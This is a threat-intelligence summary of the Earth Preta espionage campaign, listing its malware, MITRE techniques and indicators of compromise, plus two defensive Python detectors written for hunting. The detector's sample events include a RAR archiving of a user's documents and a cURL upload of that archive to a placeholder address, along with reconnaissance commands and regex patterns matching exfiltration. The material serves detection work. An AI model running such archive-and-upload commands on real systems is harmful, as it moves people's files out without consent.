Earth Preta has upgraded its attack campaigns by introducing new malware variants and using HIUPAN-based propagation through removable drives to spread PUBLOAD. The group now conducts time-sensitive spear-phishing with multi-stage downloaders and focuses on APAC government targets, employing tools like FDMTP and PTSOCKET for control and exfiltration. #EarthPreta #PUBLOAD #HIUPAN #DOWNBAIT #PULLBAIT #CBROVER #PLUGX #FDMTP #PTSOCKET
Keypoints
- Earth Preta upgraded its attacks with new tools and malware variants.
- Propagation of PUBLOAD via a variant of the worm HIUPAN through removable drives.
- Use of additional tools like FDMTP and PTSOCKET for control and data exfiltration.
- Highly targeted and time-sensitive spear-phishing campaigns observed.
- Initial access facilitated by spear-phishing emails with multi-stage downloaders.
- Data collection and exfiltration performed using RAR and cURL.
- Focus on government entities in the APAC region, particularly in military and foreign affairs sectors.
MITRE Techniques
- [T1091] Replication Through Removable Media – HIUPAN spreads through removable drives to deliver PUBLOAD.
- [T1566.001] Phishing: Spearphishing Attachment – Spear-phishing emails carry multi-stage downloaders.
- [T1547.001] Registry Run Keys / Startup Folder – An autorun registry entry is created for persistence (alongside a scheduled task).
- [T1053.005] Scheduled Task – A scheduled task is created for persistence.
- [T1574.002] DLL Side-Loading – Malicious DLLs are loaded by host executables through DLL side-loading.
- [T1480.001] Environmental Keying – The second-stage PLUGX payload is protected with RC4 and DPAPI, so it decrypts only on the victim machine.
- [T1553.002] Code Signing – DOWNBAIT is digitally signed.
- [T1055] Process Injection – PLUGX injects its code into other processes.
- [T1082] System Information Discovery – hostname and systeminfo are used for system information discovery.
- [T1518.001] Security Software Discovery – WMIC is used to enumerate installed AV products.
- [T1049] System Network Connections Discovery – netstat is used to list network connections.
- [T1016] System Network Configuration Discovery – ipconfig and netsh are used to discover network configuration.
- [T1005] Data from Local System – FILESAC is used to search for specific file types of interest.
- [T1560.001] Archive Collected Data: Archive via Utility – WinRAR or FILESAC is used to archive collected data.
- [T1567.002] Exfiltration to Cloud Storage – Telemetry suggests possible exfiltration to a cloud service.
- [T1048] Exfiltration Over Alternative Protocol – Data is exfiltrated to attacker-controlled servers using cURL or PTSOCKET.
- [T1071.001] Web Protocols – Downloaders and backdoors communicate with C&C over HTTP/HTTPS.
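The discovery, archiving and cURL upload steps above are all ordinary command-line tools, so none of them is a signal on its own; what stands out is the sequence on one host within a short window. The following Python is an added example written for this summary, not code from the Trend Micro report or from Earth Preta's tooling. It scores process-creation events (the shape of Sysmon event 1 / Windows 4688 command lines is assumed) against the techniques listed, and alerts when a host shows several distinct stages, or when archiving and an upload co-occur. The regexes, the sample events and the upload destination 203.0.113.5 (an RFC 5737 documentation address) are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each stage maps a technique from the list above to a regex over the process
# command line. The regexes are this example's own assumptions about how the
# reported commands show up in process-creation telemetry (Sysmon event 1 or
# Windows 4688); they are not published Trend Micro signatures.
STAGES = {
    "T1082 system info":        re.compile(r"\b(hostname|systeminfo)(\.exe)?\b", re.I),
    "T1518.001 AV discovery":   re.compile(r"\bwmic(\.exe)?\b.*antivirusproduct", re.I),
    "T1049 net connections":    re.compile(r"\bnetstat(\.exe)?\b", re.I),
    "T1016 net config":         re.compile(r"\b(ipconfig|netsh)(\.exe)?\b", re.I),
    "T1016 external IP (curl)": re.compile(r"\bcurl(\.exe)?\b.*myip\.ipip\.net", re.I),
    "T1560.001 archive (rar)":  re.compile(r"\b(rar|winrar)(\.exe)?\b\s+a\b", re.I),
    "T1048 upload (curl)":      re.compile(r"\bcurl(\.exe)?\b.*(\s-T\s|--upload-file|\s-F\s)", re.I),
}

# Constructed process-creation events (timestamp, host, command line). The
# upload destination 203.0.113.5 is an RFC 5737 documentation address used as
# a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    ("2024-09-02T08:01:10", "WS-07", "hostname"),
    ("2024-09-02T08:01:12", "WS-07", "systeminfo"),
    ("2024-09-02T08:01:30", "WS-07",
     r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"),
    ("2024-09-02T08:02:05", "WS-07", "netstat -ano"),
    ("2024-09-02T08:02:20", "WS-07", "ipconfig /all"),
    ("2024-09-02T08:02:41", "WS-07", "netsh interface show interface"),
    ("2024-09-02T08:03:00", "WS-07", "curl http://myip.ipip.net"),
    ("2024-09-02T08:15:00", "WS-07",
     r"rar a -r -hpPass C:\Users\Public\d.rar C:\Users\alice\Documents\*.docx"),
    ("2024-09-02T08:16:00", "WS-07", r"curl -T C:\Users\Public\d.rar http://203.0.113.5/up"),
    # Routine troubleshooting on another host: two stages only, must not alert.
    ("2024-09-02T09:00:00", "ADMIN-01", "ipconfig /all"),
    ("2024-09-02T09:05:00", "ADMIN-01", "netstat -an"),
]

def tag_event(cmdline):
    """Return the stage names whose pattern matches this command line."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]

def detect_chains(events, window=timedelta(minutes=30), min_stages=4):
    """Per host, look for a window in which enough distinct stages occur, or in
    which archiving and upload both appear (collection followed by exfil).
    Returns one finding per host that crosses the threshold."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        tags = tag_event(cmd)
        if tags:
            by_host[host].append((datetime.fromisoformat(ts), tags, cmd))
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e[0])
        for i, (t0, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - t0 <= window]
            stages = {t for _, tags, _ in in_window for t in tags}
            exfil = {"T1560.001 archive (rar)", "T1048 upload (curl)"} <= stages
            if len(stages) >= min_stages or exfil:
                findings.append({
                    "host": host,
                    "start": t0.isoformat(),
                    "stages": sorted(stages),
                    "exfil_chain": exfil,
                    "commands": [c for _, _, c in in_window],
                })
                break  # one finding per host is enough for triage
    return findings

if __name__ == "__main__":
    for f in detect_chains(SAMPLE_EVENTS):
        print(f["host"], f["start"], "exfil" if f["exfil_chain"] else "", f["stages"])
```

The threshold of four distinct stages is a starting point, not a tuned value: lower it on hosts that should never run cURL or RAR, and treat the archive-plus-upload pair as an alert regardless of count, since that is the step where data actually leaves.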
Indicators of Compromise
- [IP Address] WebDAV server – 16.162.188.93 – hosts DOWNBAIT, PULLBAIT, CBROVER and the decoy documents
- [File name] UsbConfig.exe – host executable for HIUPAN DLL side-loading
- [File name] u2ec.dll – HIUPAN malware (side-loaded DLL)
- [File name] WCBrowserWatcher.exe – host executable for PUBLOAD DLL side-loading
- [File name] cococcpdate.dll – PUBLOAD loader
- [File name] CocBox.zip – PUBLOAD encrypted component
- [File name] $.ini – HIUPAN configuration file
- [Path] C:\ProgramData\Intel_ – HIUPAN install path
- [URL] http://myip.ipip.net – used in network reconnaissance commands (curl)
- [Tool] FDMTP – secondary control tool delivered by PUBLOAD
- [Tool] PTSOCKET – exfiltration tool used by PUBLOAD
- [Malware] DOWNBAIT – signed downloader used in spear-phishing chain
- [Malware] PULLBAIT – shellcode downloader used in the chain
- [Malware] CBROVER – backdoor spawned via DLL side-loading
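Hunting on the file-name indicators above needs one caveat: the side-loading host executables are the kind of binaries that legitimately exist on endpoints, so searching for UsbConfig.exe or WCBrowserWatcher.exe alone produces noise. The indicator is the malicious DLL (and helper files) sitting in the same directory as its host. The following Python is an added example for this summary, not code from the report; it sweeps a file listing for complete side-loading sets and notes whether a hit sits under the HIUPAN install path. The listing, and every directory in it other than the IoC install path, is constructed.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Side-loading sets from the IoC list. The host executables are what side-loading
# abuses and are not suspicious on their own; the indicator is the malicious DLL
# (plus helper files) sitting next to them in the same directory.
SIDELOAD_SETS = {
    "HIUPAN":  {"usbconfig.exe", "u2ec.dll"},
    "PUBLOAD": {"wcbrowserwatcher.exe", "cococcpdate.dll", "cocbox.zip"},
}
OPTIONAL_FILES = {"HIUPAN": {"$.ini"}}          # HIUPAN config, dropped alongside the pair
INSTALL_PATH_PREFIX = r"c:\programdata\intel_"  # HIUPAN install path from the IoC list

# Constructed file listing, e.g. from a removable-volume scan plus a host
# inventory. Directory locations other than the IoC install path are assumed.
SAMPLE_FILES = [
    r"E:\UsbConfig.exe",          # removable drive root carrying the HIUPAN pair
    r"E:\u2ec.dll",
    r"E:\$.ini",
    r"E:\Reports\Q3_budget.docx",
    r"C:\ProgramData\Intel_\UsbConfig.exe",   # pair copied to the install path
    r"C:\ProgramData\Intel_\u2ec.dll",
    r"C:\Users\Public\Libraries\WCBrowserWatcher.exe",   # PUBLOAD set (assumed dir)
    r"C:\Users\Public\Libraries\cococcpdate.dll",
    r"C:\Users\Public\Libraries\CocBox.zip",
    r"C:\Program Files\Vendor\UsbConfig.exe",  # host alone: not flagged
]

def group_by_directory(paths):
    """Map each directory (case-folded) to the set of file names it contains."""
    dirs = defaultdict(set)
    for p in paths:
        wp = PureWindowsPath(p)
        dirs[str(wp.parent).lower()].add(wp.name.lower())
    return dirs

def sweep_files(paths):
    """Flag every directory that holds a complete side-loading set. A host
    executable without its companion DLL produces no finding."""
    findings = []
    for directory, names in group_by_directory(paths).items():
        for family, required in SIDELOAD_SETS.items():
            if required <= names:
                extras = OPTIONAL_FILES.get(family, set()) & names
                findings.append({
                    "family": family,
                    "dir": directory,
                    "files": sorted(required | extras),
                    "at_install_path": directory.startswith(INSTALL_PATH_PREFIX),
                })
    return findings

if __name__ == "__main__":
    for f in sweep_files(SAMPLE_FILES):
        print(f["family"], f["dir"], f["files"],
              "install path" if f["at_install_path"] else "")
```

A hit at a removable-drive root is the propagation stage (T1091); the same pair under the install path is an infected host. Where file hashes are available, add them as a second condition; file names are the weakest indicator in the list and can be renamed by the actor at any time.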
Read more: https://www.trendmicro.com/en_us/research/24/i/earth-preta-new-malware-and-strategies.html